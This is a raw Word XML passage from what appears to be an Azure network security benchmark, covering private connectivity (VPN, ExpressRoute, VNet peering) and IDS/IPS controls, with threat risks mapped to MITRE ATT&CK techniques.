      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C51BE98" w14:textId="69AB3E11" w:rsidR="0099495A" w:rsidRPr="00E53977" w:rsidRDefault="0099495A" w:rsidP="00CA019C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2B3055" w14:textId="3F4EC6CB" w:rsidR="00DE1B90" w:rsidRPr="00E53977" w:rsidRDefault="00DE1B90" w:rsidP="00FB339D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc242449472"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>NS-9: Connect on-premises or cloud network privately</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="28EC7B00" w14:textId="5EF3CCC6" w:rsidR="00FF5F5B" w:rsidRPr="00E53977" w:rsidRDefault="00FF5F5B" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09506982" w14:textId="2BD28FC9" w:rsidR="00FF5F5B" w:rsidRPr="00E53977" w:rsidRDefault="00FF5F5B" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Use private connections for secure communication between different networks, such as cloud service provider datacenters and on-premises infrastructure in a colocation environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B053BCD" w14:textId="09E0DB54" w:rsidR="00B63D66" w:rsidRPr="00E53977" w:rsidRDefault="00B63D66" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Risk of mitigating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547CC3B1" w14:textId="6B99C4A0" w:rsidR="00B63D66" w:rsidRPr="00E53977" w:rsidRDefault="00B63D66" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Data interception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4EAE1C" w14:textId="637A5DD4" w:rsidR="00951C3C" w:rsidRPr="00E53977" w:rsidRDefault="00951C3C" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Man-in-the-Middle (MitM) Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9AF5CB" w14:textId="02161467" w:rsidR="000D5ADC" w:rsidRPr="00E53977" w:rsidRDefault="000D5ADC" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>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rsidP="000B39B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Unauthorized access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0AD3C2" w14:textId="6390804D" w:rsidR="00883EC6" w:rsidRPr="00E53977" w:rsidRDefault="00883EC6" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3A0CEF" w14:textId="0461D59E" w:rsidR="00883EC6" w:rsidRDefault="00883EC6" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3BA26C" w14:textId="23E5405C" w:rsidR="00F77A46" w:rsidRPr="00E53977" w:rsidRDefault="00F77A46" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="356"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77A46">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1190 - Exploit Public-Facing Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5498BF" w14:textId="0DAAD693" w:rsidR="001D0A0D" w:rsidRDefault="001D0A0D" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B98A3A" w14:textId="6633461F" w:rsidR="00F77A46" w:rsidRPr="00E53977" w:rsidRDefault="00F77A46" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="356"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77A46">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1040 - Network Sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6624D964" w14:textId="6401C36F" w:rsidR="001D0A0D" w:rsidRDefault="001D0A0D" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C63A651" w14:textId="25CE644A" w:rsidR="00F77A46" w:rsidRPr="00E53977" w:rsidRDefault="00F77A46" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="356"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77A46">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1021 - Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4FF1AB" w14:textId="77777777" w:rsidR="001D0A0D" w:rsidRPr="00E53977" w:rsidRDefault="001D0A0D" w:rsidP="00AA1827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A2821A0" w14:textId="2D5892CD" w:rsidR="001D0A0D" w:rsidRPr="00E53977" w:rsidRDefault="001D0A0D" w:rsidP="00CB27F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>NS-9.1: Use Azure virtual private network (VPN) for lightweight site-to-site or point-to-site connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9449F9" w14:textId="7C1DFEDA" w:rsidR="001431B9" w:rsidRPr="00E53977" w:rsidRDefault="001B587D" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Deploy site-to-site VPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385BB03F" w14:textId="5E72F8DA" w:rsidR="001B587D" w:rsidRPr="00E53977" w:rsidRDefault="001B587D" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Use site-to-site VPN to securely connect your on-premises network to Azure virtual network, enabling seamless communication between on-premises resources and Azure workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D8A64A" w14:textId="0663C1B1" w:rsidR="00ED04A7" w:rsidRPr="00E53977" w:rsidRDefault="00ED04A7" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Deploy point-to-site VPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764A920B" w14:textId="1A687BFC" w:rsidR="006A51E8" w:rsidRPr="00E53977" w:rsidRDefault="006A51E8" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Deploy ExpressRoute for dedicated private connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C825D9A" w14:textId="4CDFB922" w:rsidR="00183C06" w:rsidRPr="00E53977" w:rsidRDefault="00183C06" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Deploy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Virtual WAN for global connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250CCBFD" w14:textId="06825444" w:rsidR="00AA0171" w:rsidRPr="00E53977" w:rsidRDefault="00AA0171" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>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 xml:space="preserve">NS-9.3: Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or subnet peering to join virtual networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352B17FC" w14:textId="55A8330E" w:rsidR="00790D60" w:rsidRPr="00E53977" w:rsidRDefault="00790D60" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Deploy virtual network peering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A5F122" w14:textId="613F04F9" w:rsidR="00790D60" w:rsidRPr="00E53977" w:rsidRDefault="00790D60" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Use virtual network peering to connect entire Azure virtual networks, enabling resources in different </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">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10" w:name="_Toc242449473"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitor and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>respond</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0171FF29" w14:textId="2EEF7E7E" w:rsidR="00FF075C" w:rsidRPr="00E53977" w:rsidRDefault="00FF075C" w:rsidP="009B7CEC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc242449474"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:t>NS-4: Deploy intrusion detection/intrusion prevention</w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:t>systems (IDS/IPS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="02AB7A7F" w14:textId="7E4A34E4" w:rsidR="0017603D" w:rsidRPr="00E53977" w:rsidRDefault="0017603D" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48635DC6" w14:textId="0B29BD42" w:rsidR="008C0F53" w:rsidRPr="00E53977" w:rsidRDefault="008C0F53" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Use network intrusion detection and intrusion prevention systems (IDS/IPS) to inspect the network and payload traffic to and from your workload or virtual networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166AF2F2" w14:textId="020275DA" w:rsidR="008C0F53" w:rsidRPr="00E53977" w:rsidRDefault="008C0F53" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Risk of mitigating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D19867" w14:textId="3FFA2C88" w:rsidR="008C0F53" w:rsidRPr="00E53977" w:rsidRDefault="00853A91" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Protocol exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4193F3CA" w14:textId="55EBB47B" w:rsidR="00853A91" w:rsidRPr="00E53977" w:rsidRDefault="00853A91" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Vulnerabilities in protocols like RDP (TCP 3389) or HTTP/HTTPS (TCP 80/443) enable unauthorized access or system compromise through exploits such as CVE-targeted attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C230004" w14:textId="4C2C362E" w:rsidR="00DF7ED3" w:rsidRPr="00E53977" w:rsidRDefault="00DF7ED3" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Command-and-control (C2) communications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63668619" w14:textId="26D4B63A" w:rsidR="00DF7ED3" w:rsidRPr="00E53977" w:rsidRDefault="00DF7ED3" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Malicious servers establish control over compromised devices via DNS queries or IP-based callbacks, facilitating persistent exploitation or malware propagation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7489B3B4" w14:textId="11AED8C1" w:rsidR="00DF7ED3" w:rsidRPr="00E53977" w:rsidRDefault="00DF7ED3" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Application exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED82B4B" w14:textId="0CC09AF4" w:rsidR="00796701" w:rsidRPr="00E53977" w:rsidRDefault="00796701" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Lateral movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713392EB" w14:textId="586C0962" w:rsidR="00796701" w:rsidRPr="00E53977" w:rsidRDefault="00796701" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Anomalous internal traffic, such as SMB (TCP 445) enumeration or Kerberos (TCP 88) ticket abuse, signals attacker pivoting within the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>networ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01EB4265" w14:textId="3AD7EDC2" w:rsidR="00396C5D" w:rsidRPr="00E53977" w:rsidRDefault="00396C5D" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Data exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449C318B" w14:textId="7F618430" w:rsidR="00396C5D" w:rsidRPr="00E53977" w:rsidRDefault="00396C5D" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
